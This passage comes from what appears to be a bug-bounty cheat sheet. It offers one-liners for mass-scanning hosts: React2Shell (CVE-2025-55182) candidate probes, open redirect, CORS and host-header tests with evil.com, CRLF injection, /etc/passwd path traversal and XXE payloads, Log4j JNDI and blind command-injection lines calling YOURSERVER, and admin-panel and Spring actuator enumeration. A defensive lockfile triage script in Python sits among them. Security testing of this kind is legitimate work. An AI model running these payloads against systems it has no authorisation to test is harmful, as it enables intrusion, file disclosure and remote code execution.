nuclei -l nextjs_targets.txt -t http/cves/2025/CVE-2025-55182.yaml -c 30 -o react2shell_nuclei.txt
```

⚡ Find and test - complete one-liner

```bash
subfinder -d target.com -silent | httpx -silent -match-string "/_next/" | tee nextjs.txt | xargs -I@ -P15 sh -c 'R=$(curl -s -w "\n%{http_code}" -X POST @ -H "Next-Action: x" --data "test" 2>/dev/null | tail -1); [ "$R" = "200" ] || [ "$R" = "400" ] && echo "[!] REACT2SHELL CANDIDATE: @"' | anew vuln_candidates.txt
```

⚡ Direct RSC endpoint check

```bash
curl -s -X POST "https://target.com/" -H "Next-Action: whatever" -H "Content-Type: multipart/form-data; boundary=----FormBoundary" --data-binary $'------FormBoundary\r\nContent-Disposition: form-data; name="0"\r\n\r\ntest\r\n------FormBoundary--' | head -c 500
```

⚡ Batch test from a file with parallel

```bash
cat urls.txt | parallel -j20 'curl -s -o /dev/null -w "{} - %{http_code}\n" -X POST {} -H "Next-Action: test" --data "0" 2>/dev/null' | grep -E " - (200|400|500)$" | tee react2shell_batch.txt
```

⚠️ Affected: React 19.0.0-19.2.0, Next.js 15.0.4-16.0.6 | ✅ Fix: update React to 19.0.1 / 19.1.2 / 19.2.1

🎯 Key detection signal: an app that accepts the Next-Action header + RSC deserialization = potential RCE
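A defender-side patch-status check for the affected and fixed versions quoted above, as an added example that is not part of the original cheat sheet: it reads an npm lockfile (the lockfileVersion 2/3 "packages" layout is assumed) and classifies every installed react, react-dom and next against the page's stated ranges; the sample lockfile is constructed.

```python
"""Patch-status triage for the React2Shell (CVE-2025-55182) data quoted on this page.

Added example, not part of the original cheat sheet. The affected ranges and the
fixed React releases are the ones stated above; the npm lockfile layout
(lockfileVersion 2/3 "packages" map) and the sample lockfile are assumptions.
"""
import json
import re

# Inclusive version ranges exactly as stated on the page.
REACT_AFFECTED = ((19, 0, 0), (19, 2, 0))
NEXT_AFFECTED = ((15, 0, 4), (16, 0, 6))
# Fixed React releases named on the page, keyed by their major.minor line.
REACT_FIXED = {(19, 0): (19, 0, 1), (19, 1): (19, 1, 2), (19, 2): (19, 2, 1)}


def parse_version(text):
    """Return (major, minor, patch) from 'x.y.z' or 'vx.y.z-pre'; None if unparseable."""
    m = re.match(r"^v?(\d+)\.(\d+)\.(\d+)", text.strip())
    return tuple(int(g) for g in m.groups()) if m else None


def react_status(version):
    """Classify a React version against the page's affected range and fixed releases."""
    v = parse_version(version)
    if v is None:
        return "unknown"
    fix = REACT_FIXED.get(v[:2])
    if fix is not None and v >= fix:
        return "fixed"  # at or beyond the patched release of this minor line
    if REACT_AFFECTED[0] <= v <= REACT_AFFECTED[1]:
        return "vulnerable"
    return "not affected"


def next_status(version):
    """The page gives only an affected range for Next.js and no patched release,
    so anything inside the range is flagged for manual verification."""
    v = parse_version(version)
    if v is None:
        return "unknown"
    if NEXT_AFFECTED[0] <= v <= NEXT_AFFECTED[1]:
        return "in affected range (verify the patched release in the vendor advisory)"
    return "not affected"


def triage_lockfile(lock_json):
    """Map every react / react-dom / next entry in an npm lockfile to its status.
    Nested copies (node_modules/a/node_modules/react) are checked too, since a
    vendored duplicate can stay vulnerable after the top-level upgrade."""
    lock = json.loads(lock_json)
    results = {}
    for path, entry in lock.get("packages", {}).items():
        name = path.rsplit("node_modules/", 1)[-1]
        version = entry.get("version", "")
        if name in ("react", "react-dom"):  # react-dom assumed to follow react's version line
            results[path] = react_status(version)
        elif name == "next":
            results[path] = next_status(version)
    return results


# Constructed sample lockfile: one vulnerable react, one fixed react-dom,
# a Next.js inside the stated range and a nested React 18 that is unaffected.
SAMPLE_LOCK = json.dumps({
    "name": "example-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"next": "15.0.4", "react": "19.1.1"}},
        "node_modules/next": {"version": "15.0.4"},
        "node_modules/react": {"version": "19.1.1"},
        "node_modules/react-dom": {"version": "19.1.2"},
        "node_modules/legacy-widget/node_modules/react": {"version": "18.3.1"},
    },
})

if __name__ == "__main__":
    for path, status in triage_lockfile(SAMPLE_LOCK).items():
        print(f"{path or '<root>'}: {status}")
```

Run it against a real package-lock.json instead of SAMPLE_LOCK to get the installed versions rather than the ranges declared in package.json.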

Nuclei DAST XSS

```bash
echo "https://target.com" | nuclei -dast -t dast/vulnerabilities/xss/ -rl 5
```

Open Redirect Mass

```bash
cat urls.txt | gf redirect | qsreplace "https://evil.com" | httpx -silent -location | grep "evil.com"
```

CORS Misconfiguration

```bash
cat urls.txt | httpx -silent -H "Origin: https://evil.com" -match-string "evil.com" | anew cors_vuln.txt
```

Host Header Injection

```bash
cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -match-string "evil.com"
```

CRLF Injection

```bash
cat urls.txt | qsreplace "%0d%0aX-Injected: header" | httpx -silent -match-string "X-Injected"
```

Prototype Pollution

```bash
cat js.txt | xargs -I@ curl -s @ | grep -E "(__proto__|constructor\.prototype)" | anew proto_pollution.txt
```

Cache Poisoning Detection

```bash
cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -H "X-Original-URL: /admin" -mc 200
```

IDOR Pattern Detection

```bash
cat urls.txt | grep -oE "(id|user|account|uid|pid)=[0-9]+" | sort -u | anew idor_candidates.txt
```

Race Condition URLs

```bash
cat urls.txt | grep -iE "(redeem|coupon|vote|like|follow|transfer|withdraw)" | anew race_condition.txt
```

WebSocket Endpoints

```bash
cat urls.txt | grep -iE "(socket|ws://|wss://)" | anew websocket.txt
```

Path Traversal

```bash
cat urls.txt | gf lfi | qsreplace "....//....//....//etc/passwd" | httpx -silent -match-string "root:x"
```

XXE Detection

```bash
cat urls.txt | grep -iE "\.(xml|soap)" | qsreplace '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
```

Log4j Scan

```bash
cat urls.txt | qsreplace '${jndi:ldap://YOURSERVER/a}' | httpx -silent -H 'X-Api-Version: ${jndi:ldap://YOURSERVER/a}'
```

Blind Command Injection

```bash
cat urls.txt | qsreplace "\`curl YOURSERVER\`" | httpx -silent
cat urls.txt | qsreplace "| curl YOURSERVER" | httpx -silent
```

Mass Screenshot

```bash
cat alive.txt | xargs -I@ gowitness single @ -o screenshots/
```

Technology Detection

```bash
cat alive.txt | httpx -silent -tech-detect -status-code -title | anew tech_stack.txt
```

Favicon Hash (Shodan)

```bash
# Shodan's http.favicon.hash is mmh3 over the base64-encoded icon; an MD5 digest would never match a Shodan query
curl -s https://target.com/favicon.ico | python3 -c "import mmh3,sys,codecs;print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),'base64')))"
```

Exposed Admin Panels

```bash
cat alive.txt | httpx -silent -path /admin,/administrator,/admin.php,/wp-admin,/manager,/phpmyadmin -mc 200,301,302 | anew admin_panels.txt
```

Debug Endpoints

```bash
cat alive.txt | httpx -silent -path /debug,/trace,/actuator,/metrics,/health,/info -mc 200 | anew debug_endpoints.txt
```

Spring Boot Actuators

```bash
cat alive.txt | httpx -silent -path /actuator/env,/actuator/heapdump,/actuator/mappings -mc 200 | anew spring_actuators.txt
```

WordPress Enumeration

```bash
cat alive.txt | httpx -silent -path /wp-json/wp/v2/users -mc 200 | anew wp_users.txt
```

Laravel Debug Mode

```bash
cat alive.txt | httpx -silent -match-string "Whoops" -match-string "Laravel" | anew laravel_debug.txt
```

Django Debug

```bash
cat alive.txt | httpx -silent -match-string "Django" -match-string "DEBUG" | anew django_debug.txt
```

HTTP Request Smuggling

```bash
cat alive.txt | python3 smuggler.py -q 2>/dev/null | anew smuggling.txt
```

CSP Bypass Check

```bash
cat alive.txt | httpx -silent -include-response-header | grep -i "content-security-policy" | anew csp_headers.txt
```

Subdomain from Favicon

```bash
curl -s https://target.com/favicon.ico | python3 -c "import mmh3,sys,codecs;print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),'base64')))"
```

🔍 Hacker Search Engines

| Engine | Link | Description |
| --- | --- | --- |
| Shodan | shodan.io | IoT & device search |
| Censys | censys.io | Internet scan data |
| Fofa | fofa.info | Cyberspace search |
| ZoomEye | zoomeye.org | Cyberspace mapping |
| Hunter | hunter.how | Asset discovery |
| Netlas | netlas.io | Attack surface |
| GreyNoise | greynoise.io | Internet scanners |
| Onyphe | onyphe.io | Cyber defense |
| CriminalIP | criminalip.io | Threat intel |
| FullHunt | fullhunt.io | Attack surface |
| Quake | quake.360.net | Cyberspace search |
| Leakix | leakix.net | Leak detection |
| URLScan | urlscan.io | URL analysis |
| DNSDumpster | dnsdumpster.com | DNS recon |
| crt.sh | crt.sh | Certificate search |
| SecurityTrails | securitytrails.com | DNS history |
| Pulsedive | pulsedive.com | Threat intel |
| VirusTotal | virustotal.com | File/URL analysis |
| PublicWWW | publicwww.com | Source code search |
| Grep.app | grep.app | GitHub code search |

📖 Recommended Wordlists

| Wordlist | Link | Use Case |
| --- | --- | --- |
| SecLists | GitHub | Everything |
| FuzzDB | GitHub | Fuzzing |
| Assetnote | wordlists.assetnote.io | Web content |
| OneListForAll | GitHub | Combined |
| jhaddix all.txt | GitHub | Directories |
| commonspeak2 | GitHub | Real-world |

📚 Learning Resources

Books

  • The Web Application Hacker's Handbook

  • Real-World Bug Hunting by Peter Yaworski

  • Bug Bounty Bootcamp by Vickie Li

Practice

Blogs & resources
